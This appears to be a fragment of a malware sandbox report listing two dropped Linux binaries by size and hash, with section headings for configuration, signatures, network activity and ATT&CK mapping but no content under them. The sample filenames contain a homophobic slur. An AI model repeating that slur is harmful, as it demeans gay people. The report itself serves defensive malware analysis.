/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_x86

Filesize
29KB

MD5
545dbe1d228295c958b5a3f6ec4d8278

SHA1
f8dff366ea07681be596cdb33911c3f4119d0763

SHA256
a8cbba23e7c866ccf3dc8b4d4e1cc5a51de83272cb6f8df8746a51a2817d8f7b

SHA512
fe2115ad64b5755a4b4d71660d8de94c0a7f3f7d9eb3519a6e82216621f83d0855a32c41963b22dabac02e9d82c95cca8efce568d2fdafd8123e4f443c335a3f

Download Submit
/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_x86_64

Filesize
31KB

MD5
709b104e746f24f3b18f7a1118c18bf0

SHA1
c1735eb637560a097d7a451601bb9ca2e8706e21

SHA256
abbd8780d40c95322f51410e0c77e22f3cb85a1e820ce62c604d3237c24089f1

SHA512
25d982fa5382a5ca8ad6820bb4021763c25bbe8ebc414043ade122529c0b1adcc10cd8fe6caa0b5ad5a4b97d9cfc80d0a15338e7422b2604dc2ecab88fcbba34

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads